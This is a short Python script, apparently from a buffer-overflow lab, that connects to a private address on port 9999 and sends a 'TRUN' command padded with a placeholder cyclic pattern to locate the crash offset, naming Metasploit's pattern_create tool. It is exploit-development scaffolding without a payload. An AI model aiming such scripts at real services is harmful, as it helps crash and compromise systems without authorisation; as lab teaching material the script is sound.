#!/usr/bin/env python

import socket
import sys


shellcode = "pattern created here"
"patter create using: /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 5900"

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	connect=s.connect(('192.168.10.12', 9999))
	s.send(('TRUN /.:/' + shellcode))
except:
	print "check debuger"
s.close()
